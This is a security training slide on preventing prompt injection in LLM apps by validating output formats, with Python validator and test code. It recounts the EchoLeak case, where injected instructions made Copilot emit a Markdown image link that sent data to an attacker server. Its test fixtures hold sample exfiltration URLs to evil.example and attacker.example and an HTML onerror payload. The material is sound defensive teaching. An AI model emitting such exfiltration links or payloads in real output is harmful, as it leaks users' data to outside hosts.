Part 4 · Prevention · Slide 20 of 28 · Mitigation 2 of 7
Define and validate expected output formats.
Know exactly what the AI should output — and catch it when injection changes that.
📄 OWASP LLM Top 10:2025 · LLM01 Prevention #2
OWASP M2

"Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats."

EchoLeak's exfiltration channel was a Markdown image link in Copilot's output pointing to an attacker server. If output had been validated for unauthorized external URLs before being rendered, the data channel would have been blocked — even after the injection succeeded and even without a server-side patch.
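A check of this kind can be sketched in a few lines. This is a minimal illustration, not the fix Microsoft shipped: the allowlist host `intranet.example.com` and the function name `unauthorized_urls` are assumptions made for the example. It scans for any URL in the output rather than only inline Markdown syntax, so reference-style links and bare URLs are covered as well.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would list its own trusted hosts.
ALLOWED_HOSTS = {"intranet.example.com"}

# Matches absolute URLs (scheme://...) and protocol-relative URLs (//host/...),
# stopping at whitespace, quotes, and Markdown/HTML delimiters.
URL_RE = re.compile(r"(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?//[^\s<>()\[\]\"']+")

def unauthorized_urls(model_output: str) -> list[str]:
    """Return every URL in the output whose host is not on the allowlist."""
    flagged = []
    for url in URL_RE.findall(model_output):
        host = (urlparse(url).hostname or "").rstrip(".").lower()
        if host not in ALLOWED_HOSTS:
            flagged.append(url)
    return flagged

# Usage: refuse to render when anything is flagged.
leaky = "Summary done. ![status](https://attacker.example/p.png?d=secret)"
if unauthorized_urls(leaky):
    print("blocked before rendering")
```

The check runs on the model's output only, so it holds even when the injected instructions were followed.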

Passing AI output directly to downstream rendering, email senders, or database writes without a validation step is one of the most common AI security gaps.

# System prompt: enforce a schema
"Respond ONLY in this JSON format:
 { "status": "found" or "not_found",
   "order_id": string,
   "message": string (max 200 chars, no URLs) }
 Never include external links, image tags, or content outside this schema."

# Code validates before rendering
def handle_request(prompt):
    response = call_llm(prompt)
    if not matches_schema(response, ORDER_SCHEMA):
        log_anomaly(response)
        return safe_fallback()
    if contains_external_url(response):
        block_and_alert(response)
        return safe_fallback()  # never render a blocked response
    return response
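The slide does not define `matches_schema` or `contains_external_url`. One possible shape for the deterministic check, using only the Python standard library, is sketched below. The function name `validate_order_response` and the `URL_HINT` pattern are assumptions made for this example; a schema library could do the same job.

```python
import json
import re
from typing import Optional

REQUIRED_KEYS = {"status", "order_id", "message"}
ALLOWED_STATUS = {"found", "not_found"}
# Rough URL detector (assumption): any scheme://, protocol-relative //, or www.
URL_HINT = re.compile(r"(?:[a-z][a-z0-9+.-]*:)?//|www\.", re.IGNORECASE)

def validate_order_response(raw: str) -> Optional[dict]:
    """Return the parsed object if it matches the order schema, else None."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return None
    # Exact key set: unexpected fields are rejected, not ignored.
    if not isinstance(data, dict) or set(data) != REQUIRED_KEYS:
        return None
    # Every field must be a string before its value is inspected.
    if not all(isinstance(data[key], str) for key in REQUIRED_KEYS):
        return None
    if data["status"] not in ALLOWED_STATUS:
        return None
    if len(data["message"]) > 200 or URL_HINT.search(data["message"]):
        return None
    return data

# Usage: anything that fails validation goes to the fallback path.
reply = '{"status": "found", "order_id": "A123", "message": "Shipped Tuesday."}'
print(validate_order_response(reply) is not None)
```

Rejecting unknown keys outright, rather than dropping them, keeps an injected field from passing silently to downstream code.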

Run an injection and verify that the output validation catches it, independently of whether the model resisted. Test the validator with outputs containing external URLs, unexpected JSON fields, HTML, and Markdown links. The two layers (model constraint and code validation) must each work without relying on the other.
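One way to test the validation layer on its own is to feed it hand-written hostile outputs and skip the model entirely. The sketch below assumes a validator that takes the raw output string and returns `True` when it would be rendered. The case names, `strict_validator`, and `naive_validator` are illustrative stand-ins, not part of the source.

```python
import json
from typing import Callable

# Hostile outputs written by hand, as if an injection had fully succeeded.
HOSTILE_OUTPUTS = {
    "external_url": '{"status": "found", "order_id": "A1", "message": "see https://evil.example/x"}',
    "unexpected_field": '{"status": "found", "order_id": "A1", "message": "ok", "debug": "secret"}',
    "html": '{"status": "found", "order_id": "A1", "message": "<img src=x onerror=alert(1)>"}',
    "markdown_link": '{"status": "found", "order_id": "A1", "message": "[track](//evil.example/t)"}',
    "not_json": "Sure! Here is the order you asked about.",
}

def missed_cases(validator: Callable[[str], bool]) -> list[str]:
    """Return the names of hostile outputs the validator wrongly accepted."""
    return [name for name, raw in HOSTILE_OUTPUTS.items() if validator(raw)]

def naive_validator(raw: str) -> bool:
    """Deliberately weak stand-in: accepts anything that parses as JSON."""
    try:
        json.loads(raw)
        return True
    except json.JSONDecodeError:
        return False

def strict_validator(raw: str) -> bool:
    """Crude stand-in for a real schema check plus URL/markup screening."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return False
    if not isinstance(data, dict) or set(data) != {"status", "order_id", "message"}:
        return False
    message = data["message"]
    if not isinstance(message, str):
        return False
    return not any(marker in message for marker in ("//", "<", "]("))

print(missed_cases(naive_validator))   # gaps in the weak validator
print(missed_cases(strict_validator))  # an empty list means every case was caught
```

Because no model call is involved, a failure here points at the validation code alone.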
